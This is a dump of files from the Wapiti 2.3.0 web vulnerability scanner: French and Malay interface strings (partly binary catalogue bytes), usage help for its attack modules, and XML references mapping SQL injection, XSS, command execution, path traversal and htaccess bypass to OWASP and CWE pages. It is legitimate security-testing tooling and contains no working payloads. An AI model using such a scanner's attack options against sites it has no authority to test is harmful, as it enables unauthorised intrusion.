restriction.La configuration du htaccess doit être minutieusement vérifiée pour ne pas laisser une porte d'entrée à un éventuel attaquant.Injection SQL InterbaseErreur interne au serveurErreur interne au serveur. Le serveur a fait face à une situation inattendue qui l'a empêché de traiter convenablement la requête. Cela peut être le signe de la présence d'une vulnérabilité.Les logs de votre serveur HTTP ou de l'application web concernée devraient vous renseigner sur la nature exacte du problème.Argument invalide pour l'option {0} : {1}Cet argument n'est pas un lien valide : {0}Protocole invalide : {0}Paramètre en cause : {0}Injection SQL JavaInjection LDAPDivulgation de fichiers sur un système LinuxInjection MSSQLAssurez-vous que l'URL est correcte.Injection MySQLAucun formulaire n'a été trouvé dans cette page !Aucun lien ni formulaire trouvé dans cette page !Ouvrez {0}/index.html dans un navigateur pour voir ce rapport.Injection SQL OracleInterprétation de code PHPVeuillez renseignr les champs pour le formulaire suivant : Eventuelle faille de type {0}Injection PostgreSQLFichier potentiellement dangereuxCertains scripts sont connus pour être potentiellement vulnérables et dangereux. Des listes de tels fichiers existent et sont fréquemment utilisées par des attaquants pour scanner des sites Internet à la recherche de ces vulnérabilitées.L'administrateur devrait vérifier régulièrement si des mises à jour sont disponibles pour les scripts et logiciels utilisés sur le serveur. Il est aussi conseillé de se tenir informé sur les nouvelles vulnérabilités trouvées en s'abonnant à des listes de sécurité ou en suivant des flux RSS spécialisés.Un problème est survenu avec la base de données nikto localeUne erreur HTTP 500 a été obtenue avec {0}RéférencesFaille d'inclusion distanteRapportRapport pour {0} Consommation anormale de ressourceIl a fallu un temps anormallement long au serveur pour traiter la reqêquete. Un attaquant pourrait exploiter ce type de faiblesse pour surcharger le serveur.Le script en cause utilise probablement certaines ressources système (CPU, mémoire, accès disque etc) de façon inneficace. Son améliorations devrait être étudiée.Injection SQLLes failles d'injection SQL permettent à un attaquant de modifier les requêtes qui sont normalement exécutées sur le système de base de données. Un attaquant peut alors parvenir à extraire où à modifier des informations en base. Cela peut aussi potentiellement permettre à l'attaquant d'augmenter ses privilèges sur le système.Pour se protéger des injections SQL, les données fournies par les utilisateurs ne doivent pas être utilisées telles-quelles dans les requêtes SQL mais doivent faire l'objet de vérifications (filtres, échappements) approfondies.Scan interrompu, les données ont été sauvegardées dans le fichier {0}/{1}.xmlPortée de ce scan : {0} Code source :Faille XSS permanentRésumé des vulnérabilités :Injection SQL SybaseLa requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans le paramètre {0}La requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans la query stringLa requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans le chemin de la ressourceLe serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le paramètre {0}Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans la query stringLe serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le chemin de la ressourceLe scan a été sauvegardé dans le fichier {0}/{1}.xmlUn délais d'attente dépassé a eu lieu avec {0}Pour reprendre ce scan, vous pouvez lancer wapiti avec l'option "-i"Vers: {0}URLSURLsScripts d'uploadScripts d'upload trouvés :Wapiti-2.3.0 (wapiti.sourceforge.net)Avertissement assertAvertissement execAvertissement usort()Divulgation de fichiers sur un système WindowInjection XPathFaille XSSFaille XSS trouvée via l'injection dans le paramètre {0}Faille XSS trouvée via l'injection dans la query stringFaille XSS trouvée via l'injection dans le chemin de la ressourceVous pouvez l'utiliser pour lancer de futures attaques sans avoir à relancer le scan via le paramètre "-k"[!] Dépendances manquantes pour le module {0} :[!] Impossible de trouver le module {0}[*] Chargement des modules :[+] Lancement du module {0}PoC en commande cURL : "{0}"erreur: délais d'attente dépassé lors de l'attaque de {0}erreur : {0} lors de l'attaque de {1}Divulgation de fichier présent dans basedur vie highlight_file()Inclusion d'un fichier présent dans le include_pathInjection via preg_replaceurl = {0}Wapiti-2.3.0 - Un scanneur de vulnérabilités pour applications web Mode d'emploi : python wapiti.py http://server.com/base/url/ [options] Les options possibles sont les suivantes : -s --start Commencer le scan par l'url spécifiée. Cette option peut être appelée plusieurs fois. Wapiti va explorer ces liens afin de trouver de nouvelles URLs même si c'est liens sont hors du périmètre de scan. -x --exclude Pour exclure une url du scan (par exemple un script de déconnexion). Cette option peut être appelée plusieurs fois. L'usage de l'astérisque (*) est possible comme expression régulière basique. Exemple : -x http://server/base/?page=*&module=test ou -x http://server/base/admin/* pour exclure un répertoire -p --proxy Spécifier l'utilisation d'un proxy. Les types de proxies actuellement supportés sont HTTP et HTTPs. Cette option peut être appelée deux fois afin d'indiquer le proxy HTTP ainsi que celui pour le HTTPS. Exemple: -p http://proxy:port/ -c --cookie Importer des cookies à utiliser pour le scan. Le fichier conteneur de cookies doit être au format JSON. Les cookies peut être récupérés via l'utilisation des outils cookie.py et getcookie.py présents dans le dossier "net". -t --timeout Définir le temps d'attente (en secondes) d'une réponse du serveur pour une requête. -a --auth Spécifier des identifiants pour l'authentification HTTP --auth-method Si le serveur réclame une authentification, permet de spéficier la méthode d'authentification à utiliser. Les méthodes actuellement supportées sont (certaines nécessitent l'installation de module supplémentaires) : + basic + digest + kerberos + ntlm -r --remove Retirer un paramêtre (nom et valeur) de toutes les URLs. -n --nice Définir une limite pour le nombre d'URLs à traiter qui sont basées sur la même construction (càd, le nombre maximum de valeurs uniques pour un même paramètre). Utilisez cette option pour éviter d'entrer dans des boucles infinies lors du scan. Cette valeur doit être supérieur à 0. -m --module Définir les modules et les méthodes HTTP associées à utiliser pour les attaques. Précédez le nom d'un module par un tiret pour le désactiver. Pour explorer la cible sans lancer la moindre attaque, désactivez tous les modules avec -m "-all". En l'absence de méthodes HTTP spécifiées pour un module, GET et POST seront utilisés. Exemple: -m "-all,xss:get,exec:post" -u --color Utiliser les couleurs du terminal pour mettre en valeur les vulnérabilités et anomalies. -v --verbose Définie le niveau de verbosité des résultats. 0: silencieux (défaut), 1: affiche chaque url, 2: affiche chaque attaque. -b --scope Définir le périmètre du scan : + page : analyser uniquement la page donnée en argument principal. + folder : analyser toutes les pages trouvées sous l'arborescence passée comme URL (par défaut). + domain : analyser toutes les pages trouvées pour le domaine correspondant à celui spécifié dans l'URL passée à Wapiti. -f --format Définir le format du rapport. json: Rapport au format JSON html: Rapport au format HTML (choix par défaut) openvas: Rapport au format XML OpenVAS txt: Rapport au format texte simple (UTF-8) vulneranet: Rapport au format XML VulneraNET xml: Rapport au format XML -o --output Spéficier l'emplacement du disque où enregistrer le rapport. Si le rapport est au format html, ce paramètre sera utilisé comme nom de répertoire. -i --continue Reprendre une session de scan en chargeant le status sauvegardé dans le fichier XML spécifié. Si le paramètre est appelé sans argument, Wapiti charge la session depuis un fichier par défaut présent dans le dossier "scans". -k --attack Lancer directement les attaques en chargeant les URLs présentes dans le fichier XML de status spécifié (sans relancer l'exploration des pages du site). Si le fichier n'est pas spécifié, Wapiti charge un fichier par défaut présent dans le dossier "scans". --verify-ssl <0|1> Indique à Wapiti s'il doit ou non vérifier les certificats SSL. Le comportement par défaut est de vérifieir les certificats. -h --help Afficher ce message d'aide {0} : {1:>3} {0} HtAccess{0} dans {1} via une injection dans le paramètre {2}{0} dans {1} via une injection dans la query string{0} dans {1} via une injection dans le chemin de la ressource{0} via une injection dans le paramètre {1}{0} via une injection dans la query string| Code HTTP : {0}| Code HTTP : {0} : {1}wapiti-2.3.0+dfsg/wapitiCore/config/language/ms/000077500000000000000000000000001240201516300214775ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/ms/LC_MESSAGES/000077500000000000000000000000001240201516300232645ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/ms/LC_MESSAGES/wapiti.mo000066400000000000000000000546611240201516300251320ustar00rootroot00000000000000$, %     '7IQ`p+b'r %BZi z!  3T r 1/ CQ` -$97K7% 3#C gq!!%@f)/?&]6,#8&S#z"   $ 9Z x< 3POaNOiPhi#0G%*/>%Tz +:9/:i]'%*Pe~")!% < F P ^-k,-&% A Q ;g &!! ! !! ""&"7"M"U"f"v""#"""#e"#&# #9#$#%%5%+'' (P([o*#***+U++4+-1,_- /0010'D0l010000#01,1v3+y5"5G5>6:O6.6 666636%%7 K7"U7x77F(8o88h8>9)@9j9999 9(9::6:*E:7p:A:: :*;3;M;a;Dy;B;-</<O<!X<z<<<<{E= ='=>>? @ !@.@N@b@Xr@n@j:AfAs BuB1B(CQ=CCCCC+C%CD D#D*2D]D lD9zDLDIEgKE*E-E F!F:F%TFzF'F%FF FgG oX }X.XAX.X'*Y:RYYY{w!kA O>U]3[(v^@/X-K=<7fja| 0~s9 +\"$ZBd6'Y.nI qe xh}Dmtr2PS:Rg8%HJQ*o`byTV;L#zu 1E_5lCc?iWM4&),pGNF .htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLF InjectionCRLF descriptionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been savedin the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE Last-Translator: FULL NAME Language-Team: LANGUAGE Language: MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Kelemahan pemintasan .htaccess : {0} Pautan berbahaya: {0} melalui {0} * Inputs: * Kaedah: {0} * Pilih: * Kawasan teks: * URLs dilayari * URLs untuk dilayar Notice(RENTETAN_QUERY)+ attackGET {0}+ attackPOST {0} dari {1}Suntikan .NET SQLLaporan telah dijana dalam fail {0}Akses berasaskan Suntikan SQLSuntikan SQL berasaskan AksesKeganjilan (anomalies) ditemui:Proses serangan terganggu. Untuk mengulangi serangan, lancarkan Wapiti dengan "-i" or "-k" parameter.Kelemahan pendedahan fail BSD setempatFail SadaranKemungkinan untuk menemui fail sandaran pada skrip di pelayan web dimana pentadbir web meletakkan disini untuk menyimpan versi sebelum atau fail sandaran yang dijana secara automasi oleh perisian penyuntingan (seperti Emacs). Salinan ini boleh mendedahkan maklumat yang menarik seperti kod program atau kelayakkanPentadbir web mesti secara manual menghapuskan fail sandaran atau mengalihnya keluar dari laman web asas (root). Pentadbir web perlu menyusun semula penyunting untuk menyahaktifkan sandaran automatikFail sandaran {0} ditemui untuk {1}Suntikan buta SQL Suntikan SQL buta merupakan teknik yang mengeksploitasi kelemahan yang berlaku in the database of an application. This kind of vulnerability is harder to dalam pangkalan data aplikasi. Kelemahan jenis ini lebih sukar untuk mengesan daripada suntikan SQL asas kerana mesej ralat akan dipaparkan pada laman web.Untuk melindungi daripada suntikan SQL, input pengguna mestilah tidak terus dimasukkan ke dalam penyata SQL. Sebaliknya, input pengguna mesti di 'escaped' atau ditapis atau penyata diparameter mesti digunakanKelemahan SQL buta Suntikan CRLFIstilah CRLF merujuk kepada Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). Ia digunakan untuk memaklumkan penamatan talian, Walau bagaimanapun, diuruskan berbeza dalam sistem operasi popular hari ini. Sebagai contoh: dalam Windows kedua-dua CR dan LF perlu ambil perhatian akhir garisan, manakala dalam Linux/UNIX LF yang hanya diperlukan. Kombinasi ini CR dan LR digunakan untuk contoh apabila menekan 'Enter' pada papan kekunci. Bergantung pada aplikasi digunakan, menekan 'Enter' pada amnya mengarahkan aplikasi untuk memulakan sebuah baris baru, atau untuk menghantar perintah.Semak parameter dihantar dan tidak membenarkan CRLF yang akan disuntik oleh penapisan CRLFPilih borang yang anda hendak guna:Perintah arahanPerintah arahanSerangan ini terdiri dalam melaksanakan arahan sistem pada pelayan Penyerang cuba menyuntik perintah ini dalam parameter permintaanLebih cenderung berfungsi tanpa pengguna input bila menggunakan fail sistem panggilanSambungan ditolak!Penyuntikan Skrip Ke Laman Web(Cross Site Scripting)Serangan injeksi code pada laman (XSS) adalah jenis kelemahan keselamatan komputer biasanya didapati dalam aplikasi web yang membolehkan suntikan kod oleh pengguna web yang berniat jahat ke dalam laman web yang dilihat oleh pengguna web lain. Contoh-contoh Kod termasuk skrip kod HTML dan skrip klien.Cara terbaik untuk melindungi aplikasi web yang daripada serangan XSS adalah memastikan bahawa aplikasi melaksanakan pengesahan semua pengepala, cookies, rentetan pertanyaan, medan borang, dan medan-medan yang tersembunyi. Pengguna pengekodan dibekalkan output dalam pelayan boleh juga mengalahkan kelemahan XSS dengan menghalang skrip yang dimasukkan dari dihantar kepada pengguna dalam bentuk yang boleh dilaksanakan. Aplikasi boleh mendapat perlindungan ketara daripada javascript berdasarkan serangan dengan menukar aksara berikut di semua output yang dihasilkan dengan entiti HTML yang sesuai pengekodan: <, >, &, ", ', (, ), #, %, ; , +, -.Suntikan DB2Tarikh imbasan : {0} Memua turun dari web...Masukkan nombor : Ralat memuat turun pangkalan data NiktoRalat mendapatkan url {0}Ralat: Pelayan tidak memahami permintaan tersebutAmaran penilaianPermintaan berbahaya:Permintaan berbahaya: Pengecualian pada lswww.browse: {0}Pengendalian FailSerangan ini adalah juga dikenali sebagai laluan Transversal atau Transversal direktori, dimana matlamatnya adalah akses kepada fail-fail dan direktori yang disimpan di luar web asas direktori. Penyerang cuba meneroka direktori yang disimpan dalam web pelayan. Penyerang menggunakan beberapa teknik, sebagai contoh, memanipulasi pembolehubah rujukan fail dengan ' dot-dot-slash (.../)' urutan dan variasi untuk bergerak ke direktori asas untuk mengemudi sistem fail iniLebih cenderung berfungsi tanpa input dari pengguna bila menggunakan fail sistem panggilan.Mengguna indeks daripada bahagian sebenar fail nama apabila membuat 'templating' atau menggunakan fail bahasa (cth: nilai 5 dari pilihan pengguna = Czechoslovakian, bukannya mengharapkan pengguna untuk kembali 'Czechoslovakian'). Memastikan pengguna tidak boleh membekalkan semua bahagian laluan - mengelilingi ia dengan kod laluan anda. Mengesahkan input pengguna dengan hanya menerima yang diketahui baik - jangan membetulkan data. Gunakan 'chrooted jails' dan kod akses polisi untuk menyekat di manafail boleh diperolehi atau disimpan.Kelemahan pendedahan fail pada include_pathFail {0} dimuatkan, imbasan terus:Fail {0} dimuatkan. Wapiti akan menggunakannya untuk melakukan seranganFail {0} tidak ditemui, Wapiti akan mengimbas semula laman webFail {0} tidak ditemui. Wapiti akan imbas semula laman webArgumen pertama mestilah url asas (root url) !Borang {0}BorangMaklumat BorangTemui fail sandaran !Menemui serangan XSS tetap oleh{0} dengan medan {1}Menemui XSS tetap pada {0} dengan {1}Dari: {0}Perlindungan HtAccess ditemui: {0}Pemintasan HtaccessFail htaccess digunakan untuk menyekat akses ke beberapa fail atau kaedah HTTP. Dalam sesetengah kes mungkin untuk memintas sekatan ini dan mengakses fail.Pastikan setiap kaedah HTTP adalah dilarang jika kelayakan yang buruk.Suntikan InterbaseRalat Pelayan DalamanRalat telah berlaku pada bahagian pelayan, dimana mencegah proses permintaan. Ia mungkin tanda kelemahanMaklumat lanjut mengenai ralat perlu dicari dalam log pelayan.Argumen tidah sah untuk pilihan {0} : {1}Pautan argumen tidak sah: {0}Protokol tidak sah: {0}Parameter terlibat: {0}Suntikan Java.SQLSuntikan LDAPKelemahan pendedahan fail Linux setempatSuntikan berasaskan MSSQLPastikan url adalah betul.Suntikan MySQLTiada borang ditemui pada muka laman ini !Tiada pautan atau borang ditemui dalam muka laman ini !Buka {0}/index.html dengan pelayar web untuk melihat laporan ini.Suntikan OraclePenilaian PHPSila masukkan nilai untuk borang berikut: Kemungkinan {0} kelemahanSuntikan PostgreSQLFail berpontensi bahayaFail yang berpotensi mempunyai kelemahan telah ditemui di laman web.Pastikan skrip dikemaskini dan menghadkan capaian sekiranya boleh.Gangguan dengan pangkalan data setempat niktoTerima ralat HTTP 500 dalam {0}Rujukan:Kemasukan kelemahan jauh (remote)LaporanLaporan untuk {0} Penggunaan sumberIa mengambil masa yang tidak normal ke pelayan untuk membalas pertanyaan. Penyerang mungkin memanfaatkan kelemahan untuk memuat (overload) pelayan jenis ini.Skrip terlibat mungkin menggunakan sumber pelayan (CPU, memori, rangkaian, capaian fail...) dengan cara yang tidak efisyen.Suntikan SQLsuntikan kelemahan SQL ini membolehkan penyerang untuk mengubah pertanyaan yang dilaksanakan pada bahagian belakang pangkalan data. Penyerang kemudian mungkin dapat ekstrak atau mengubah suai maklumat yang disimpan dalam pangkalan data atau meningkatkatkan keistimewaan (privileges) pada sistem.Untuk melindungi daripada suntikan SQL, input pengguna mestilah tidak secara langsung dimasukkan ke dalam penyata SQL. Sebaliknya, input pengguna mesti 'escaped' atau ditapis atau penyata diparameter mesti digunakanImbasan berhenti, data telah disimpan dalam fail {0} / {1}.xmlSkop imbasan : {0} Kod program:Kelemahan XSS simpanan (stored)Rumusan kelemahan :Suntikan SybasePermintaan tamat masa ketika mencuba untuk menyuntik muatan (payload) pada parameter {0}Permintaan tamat masa sementara mencuba untuk menyuntik muatan (payload) pada rentetan perintah (query string)Permintaan tamat masa sementara mencuba untuk menyuntik muatan (payload) pada sumber laluan(resource path)Pelayan membalas kod ralat HTTP 500 ketika mencuba untuk menyuntik muatan (payload) pada parameter {0}Pelayan membalas kod ralat HTTP 500 ketika mencuba menyuntik muatan (payload) pada rentetan perintah (query string)Pelayan membalas kod ralat HTTP 500 ketika mencuba untuk menyuntik muatan (payload) pada laluan sumber(resource path)Imbasan ini telah disimpan dalam fail {0}/{1}.xmlTamat masa dalam {0}Untuk meneruskan imbasan ini, anda harus melancarkan Wapiti dengan "-i" parameterKe: {0}URLSURLsMemuat naik skripMemuat naik skrip (Upload scripts) ditemui:Wapiti-2.3.0 (wapiti.sourceforge.net)Amaran menegaskanAmaran execAmaran usort()Kelemahan pendedahan fail Windows setempatSuntikan XPathKelemahan XSSKelemahan XSS ditemui melalui suntikan pada parameter {0}Kelemahan XSS ditemui melalui suntikan pada rentetan perintah (query string)Kelemahan XSS ditemui melalui suntikan pada sumber laluan (resource path)Anda boleh menggunakannya untuk melakukan serangan tanpa imbasan semula laman web dengan "-k" parameter[!] Hilang kebergantungan untuk modul {0}:[!] Tidak dapat menemui modul yang dinama {0}[*] Memuatkan modul:[+] Pelancaran modul {0}Perintah cURL PoC : "{0}"ralat: tamat masa ketika serangan {0}ralat: {0} ketika serangan {1}Kelemahan highlight_file() pada basedirinclude() termasuk dalam include_pathSuntikan preg_replaceurl = {0}Wapiti-2.3.0 - Pengimbas kerentanan aplikasi web dan sekuriti auditor Usage: python wapiti.py http://server.com/base/url/ [options] Pilihan arahan yang disokong oleh aplikasi: -s --start Untuk menentukan url bermula dengan. Pilihan ini boleh diguna pakai beberapa kali. Wapiti akan lihat pautan ini untuk mencari lebih banyak URL walaupun pautan tertentu tidak berada di dalam skop. -x --exclude Untuk mengecualikan URL dari imbasan (contoh: URL log keluar). Pilihan ini boleh diguna pakai beberapa kali untuk menentukan beberapa URL. Kad liar (*) boleh digunakan di URL untuk regex asas. Contoh : -x http://server/base/?page=*&module=test atau -x http://server/base/admin/* untuk mengecualikan satu direktori. -p --proxyi Untuk menentukan proksi. Proksi-proksi yang disokong pada masa ini adalah HTTP dan HTTPS. Pilihan ini boleh digunakan dua kali untuk tentukan proksi HTTP dan HTTPS. Contoh: -p http://proksi:port/ -c --cookie Untuk mengimport cookie menggunakan imbasan. Fail cookie tersebut mesti dalam format JSON. Cookies boleh diperolehi menggunakan utiliti cookie.py dan getcookie.py (direktori net). -t --timeout Untuk menetapkan had tamat masa(maksimum masa dalam saat menunggu pelayan untuk menghantar maklum balas). -a --auth Kelayakan yang ditetapkan bagi pengesahan HTTP. --auth-method Jika pelayan memerlukan pengesahan, tetapkan kaedah pengesahan untuk digunakan. Kaedah yang disokong pada masa ini (sesetengah memerlukan modul tambahan untuk dimuat turun) adalah: + basic + digest + kerberos + ntlm -r --remove Mengeluarkan satu parameter (nama dan nilai) dari URL. -n --nice Menentukan had URL untuk mencari dengan pola yang sama (iaitu, bilangan maksimum nilai-nilai yang unik bagi parameter yang sama). Gunakan pilihan ini untuk menghalang 'loop' berterusan semasa imbasan. Had mesti lebih daripada 0. -m --module Menyediakan modul (dan kaedah HTTP untuk setiap modul) untuk diguna ketika serangan. Guna prefiks nama modul dengan 'dash' untuk menyahaktifkan modul yang berkaitan. Untuk hanya mencari sasaran (tanpa menghantar sebarang muatan), menyahaktifkan setiap modul dengan -m "-all". Jika anda tidak menentukan kaedah HTTP, GET dan POST akan digunakan. Contoh: -m "-all,xss:get,exec:post" -u --color Menggunakan warna untuk menyerlahkan kelemahan dan keganjilan (anomalies) dalam output. -v --verbose Tetapkan tahap verbositi. 0:tenang (default), 1: cetak setiap URL, 2: cetak setiap serangan. -b --scope Set skop imbasan: + page: untuk menganalisis hanya muka laman yang diberikan sebagai URL asas. + folder: untuk menganalisis semua URL di bawah URL asas dihantar ke Wapiti (default). + domain: untuk menganalisis semua pautan pada muka laman yang mengandungi domain URL sama yang dihantar ke Wapiti. -f --format Set jenis format untuk laporan. json: Laporan dalam format JSON html: Laporan dalam format HTML (default) openvas: Laporan dalam format OpenVAS XML txt: Laporran dalam teks biasa (UTF-8) vulneranet: Laporan dalam format VulneraNET (berasaskan XML) xml: Laporan dalam format XML -o --output Tetapkan nama fail laporan. Jika format laporan yang dipilih adalah 'html', parameter ini akan digunakan sebagai nama direktori. -i --continue Parameter ini menyatakan kepada Wapiti untuk menyambung imbasan sebelumnya yang disimpan di dalam fail status XML yang ditentukan sebelum ini. Nama fail adalah pilihan, jika tidak dinyatakan, Wapiti mengambil fail default daripada direktori "scans". -k --attack Parameter ini menyatakan kepada Wapiti untuk meneruskan serangan tanpa mengimbas laman web sekali lagi, memuatkan status imbasan daripada fail yang ditentukan. Nama fail adalah pilihan, jika ia tidak dinyatakan, Wapiti mengambil defaultfail daripada direktori "scans". --verify-ssl <0|1> Parameter ini menyatakan sama ada Wapiti perlu menyemak Sijil SSL. Default adalah untuk mengesahkan sijil-sijil -h --help Untuk mencetak mesej penggunaan ini {0} : {1:>3} {0} HtAccess{0} in {1} melalui suntikan pada parameter {2}{0} in {1} melalui suntikan pada rentetan perintah(query string) {0} in {1} melalui suntikan pada sumber laluan{0} melalui suntikan pada parameter {1}{0} melalui suntikan pada rentetan perintah (query string)Kod |HTTP: {0}|HTTP Kod: {0} : {1}wapiti-2.3.0+dfsg/wapitiCore/config/reports/000077500000000000000000000000001240201516300207735ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/reports/generators.xml000066400000000000000000000030401240201516300236630ustar00rootroot00000000000000 XML format xml xmlreportgenerator XMLReportGenerator HTML format html htmlreportgenerator HTMLReportGenerator TXT format txt txtreportgenerator TXTReportGenerator VulneraNET format vulneranet vulneranetxmlreportgenerator VulneraNetXMLReportGenerator JSON format json jsonreportgenerator JSONReportGenerator OpenVAS XML format openvas openvasreportgenerator OpenVASReportGenerator wapiti-2.3.0+dfsg/wapitiCore/config/vulnerabilities/000077500000000000000000000000001240201516300224765ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/vulnerabilities/anomalies.xml000066400000000000000000000023261240201516300251730ustar00rootroot00000000000000 Internal server error description Wikipedia article for 5xx HTTP error codes https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#5xx_Server_Error Resource consumption description http://www.owasp.org/index.php/Asymmetric_resource_consumption_(amplification) http://www.owasp.org/index.php/Asymmetric_resource_consumption_(amplification) <![CDATA[CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')]]> http://cwe.mitre.org/data/definitions/400.html wapiti-2.3.0+dfsg/wapitiCore/config/vulnerabilities/vulnerabilities.xml000066400000000000000000000165171240201516300264330ustar00rootroot00000000000000 SQL Injection description http://www.owasp.org/index.php/SQL_Injection http://www.owasp.org/index.php/SQL_Injection http://en.wikipedia.org/wiki/SQL_injection http://en.wikipedia.org/wiki/SQL_injection <![CDATA[CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')]]> http://cwe.mitre.org/data/definitions/89.html Blind SQL Injection description http://www.owasp.org/index.php/Blind_SQL_Injection http://www.owasp.org/index.php/Blind_SQL_Injection http://www.imperva.com/resources/adc/blind_sql_server_injection.html http://www.imperva.com/resources/adc/blind_sql_server_injection.html <![CDATA[CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')]]> http://cwe.mitre.org/data/definitions/89.html File Handling description http://www.owasp.org/index.php/Path_Traversal http://www.owasp.org/index.php/Path_Traversal http://www.acunetix.com/websitesecurity/directory-traversal.htm http://www.acunetix.com/websitesecurity/directory-traversal.htm <![CDATA[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')]]> http://cwe.mitre.org/data/definitions/22.html Cross Site Scripting description http://www.owasp.org/index.php/Cross_Site_Scripting http://www.owasp.org/index.php/Cross_Site_Scripting http://en.wikipedia.org/wiki/Cross-site_scripting http://en.wikipedia.org/wiki/Cross-site_scripting VulneraNET wiki: Cross Site Scripting Flaw article http://lab.gsi.dit.upm.es/semanticwiki/index.php/Cross_Site_Scripting_Flaw <![CDATA[CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')]]> http://cwe.mitre.org/data/definitions/79.html CRLF description http://www.owasp.org/index.php/CRLF_Injection http://www.owasp.org/index.php/CRLF_Injection http://www.acunetix.com/websitesecurity/crlf-injection.htm http://www.acunetix.com/websitesecurity/crlf-injection.htm VulneraNET wiki: CRLF Injection article http://lab.gsi.dit.upm.es/semanticwiki/index.php/CRLF_Injection <![CDATA[CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')]]> http://cwe.mitre.org/data/definitions/93.html Commands execution description http://www.owasp.org/index.php/Command_Injection http://www.owasp.org/index.php/Command_Injection <![CDATA[CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')]]> http://cwe.mitre.org/data/definitions/78.html Htaccess bypass description http://blog.teusink.net/2009/07/common-apache-htaccess-misconfiguration.html http://blog.teusink.net/2009/07/common-apache-htaccess-misconfiguration.html CWE-538: File and Directory Information Exposure http://cwe.mitre.org/data/definitions/538.html Backup file description Testing for Old, Backup and Unreferenced Files (OWASP-CM-006) http://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006) CWE-530: Exposure of Backup File to an Unauthorized Control Sphere http://cwe.mitre.org/data/definitions/530.html Potentially dangerous file description The Open Source Vulnerability Database http://osvdb.org/ 